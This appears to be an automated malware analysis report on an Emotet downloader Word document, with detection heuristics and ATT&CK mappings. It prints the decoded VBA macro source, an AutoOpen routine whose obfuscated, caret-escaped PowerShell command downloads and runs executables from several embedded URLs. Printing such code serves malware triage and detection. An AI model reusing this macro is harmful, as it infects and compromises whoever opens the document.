Verdict: MALICIOUS (Risk Score 142)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6787868-0', indicating a known downloader. The presence of a VBA macro with an AutoOpen function, which is a common technique for Emotet, further supports this classification. The script attempts to construct and execute a command, likely to download and run a secondary payload.
Heuristics (5)

- ClamAV: Doc.Downloader.Emotet-6787868-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6787868-0
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4330 bytes |

SHA-256: b3630eb3324ce0ec00cae2680b59d19c351eea8dfddbceab6e100eeef3597a22

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "jisMDRw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim jujpOz()
ReDim jujpOz(4)
jujpOz(0) = 506070408
jujpOz(1) = 324
jujpOz(2) = 441
jujpOz(3) = 6
Dim CczCM()
ReDim CczCM(4)
CczCM(0) = 781
CczCM(1) = 9
CczCM(2) = 9150
CczCM(3) = 9
Dim qjzcp()
ReDim qjzcp(3)
qjzcp(0) = 469
qjzcp(1) = 776
qjzcp(2) = 74
Dim HoQjJA()
ReDim HoQjJA(4)
HoQjJA(0) = 1277
HoQjJA(1) = 89
HoQjJA(2) = 8403
HoQjJA(3) = 45
Dim SKwOn()
ReDim SKwOn(3)
SKwOn(0) = 447267940
SKwOn(1) = 154510115
SKwOn(2) = 123
Dim QiSWYD()
ReDim QiSWYD(2)
QiSWYD(0) = 7606
QiSWYD(1) = 33
Shell@ IJRCocJpHiG + ZSalkIYl + QKwcbvlm, Format(0)
Dim SNHvH()
ReDim SNHvH(5)
SNHvH(0) = 5
SNHvH(1) = 216725380
SNHvH(2) = 28
SNHvH(3) = 4292
SNHvH(4) = 34
Dim ikzjZ()
ReDim ikzjZ(2)
ikzjZ(0) = 4056
ikzjZ(1) = 49753595
Dim zDUZR()
ReDim zDUZR(3)
zDUZR(0) = 336113972
zDUZR(1) = 529
zDUZR(2) = 975
Dim zFdCv()
ReDim zFdCv(3)
zFdCv(0) = 7
zFdCv(1) = 381
zFdCv(2) = 2857
End Sub
Attribute VB_Name = "IDrCGYOVw"
Function IJRCocJpHiG()
On _
Error _
Resume _
Next
Dim Qcvzz()
ReDim Qcvzz(2)
Qcvzz(0) = 40
Qcvzz(1) = 4827
Dim mPCBMC()
ReDim mPCBMC(3)
mPCBMC(0) = 51599234
mPCBMC(1) = 2635
mPCBMC(2) = 207
YQvqa = Format(Chr(10 + 16 + 11 + 5 + 57)) + "md /V^:/" + Format(Chr(7 + 11 + 8 + 3 + 38)) + Format(Chr(3 + 5 + 3 + 1 + 22)) + "^s^e^t" + " ^XK^d=^ ^ ^ ^ ^ " + "^ ^ ^ " + " ^ ^ ^ }^}{h" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^t^a" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "}^;^" + "k^aerb;^F^zv^" + "$ m^e^t^I^" + "-^ek^ovn^I^;)" + "Fzv$^ ,S^BV$(eliFd^a^o^ln" + "w^o^D.^wV^B${^yr^t^{" + ")YRn^$ ni^ SBV^" + "$(^h" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^a^ero^f;^'^ex^e^.^'+^z^S" + "r^$^+^'"
Dim ICjTl()
ReDim ICjTl(4)
ICjTl(0) = 242176595
ICjTl(1) = 8309
ICjTl(2) = 486
ICjTl(3) = 91
Dim KjuCz()
ReDim KjuCz(2)
KjuCz(0) = 2230
KjuCz(1) = 927
Dim pBVEZ()
ReDim pBVEZ(4)
pBVEZ(0) = 3417
pBVEZ(1) = 1
pBVEZ(2) = 4
pBVEZ(3) = 12
iSAlzkwSbWo = "\'^+" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "il^bup:vn^e$=" + "Fzv^$^;'^7^9^7'" + "^ ^= ^z^Sr^$;)^'^@'(^til^pS." + "'n7^9^0^8^L/^m^o" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^.atin" + "^aw^gn" + "a^tn^e^t^l" + "^ek^i^tr^a//:ptt^h@P^Dky^3/^d" + "i.^be^w^.urab^le^kitr^ab^ew//" + "^:p^t^th^@^x^xYH" + "^sf/m^o" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^." + Format(Chr(10 + 16 + 11 + 5 + 57)) + "megka//^:^p" + "^t^th^@^i^gXm^F^8z2/mo" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^.l^l^i"
Dim ZHsZF()
ReDim ZHsZF(4)
ZHsZF(0) = 344686345
ZHsZF(1) = 91519779
ZHsZF(2) = 4715
ZHsZF(3) = 6
Dim ToiVKX()
ReDim ToiVKX(5)
ToiVKX(0) = 1485
ToiVKX(1) = 2913
ToiVKX(2) = 30
ToiVKX(3) = 9967
ToiVKX(4) = 5
Dim MOtwY()
ReDim MOtwY(3)
MOtwY(0) = 22
MOtwY(1) = 1602
MOtwY(2) = 91
Dim mXBPuz()
ReDim mXBPuz(5)
mXBPuz(0) = 3
mXBPuz(1) = 8077
mXBPuz(2) = 4
mXBPuz(3) = 793
mXBPuz(4) = 99
shGpbmnXn = "r^gto^ira^l//:" + "^p^t^t^h^@hpT^Or/^mo" + Format(Chr(10 + 16 + 11 + 5 + 57)) + ".^ss^er" + "d^d^a^ev^i^t" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^ep" + "s^w^en//^:p^t^th'=^Y" + "Rn$^;tnei^l" + Format(Chr(7 + 11 + 8 + 3 + 38)) + "^be^W.t^eN t" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "e^jb" + "^o-^wen=^wVB$^ lle^h^srew" + "^o^p&&^f^or /^L %^T ^in (3^" + "7^6^;-^1^;0)^d^" + "o ^se^t ^Q^S" + "l=!^Q^Sl" + "!!^XK^d:~%" + "^T,1!&&^i^f %^T=^=^0 " + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^a^ll"
Dim cfpJLs()
ReDim cfpJLs(3)
cfpJLs(0) = 29
cfpJLs(1) = 333202737
cfpJLs(2) = 6172
Dim KwhNF()
ReDim KwhNF(4)
KwhNF(0) = 857
KwhNF(1) = 9
KwhNF(2) = 9823
KwhNF(3) = 6439
Dim NjsvJp()
ReDim NjsvJp(3)
NjsvJp(0) = 7
NjsvJp(1) = 2123
NjsvJp(2) = 24
Dim frCGTv()
ReDim frCGTv(3)
frCGTv(0) = 62
frCGTv(1) = 9
frCGTv(2) = 38
pp
... (truncated)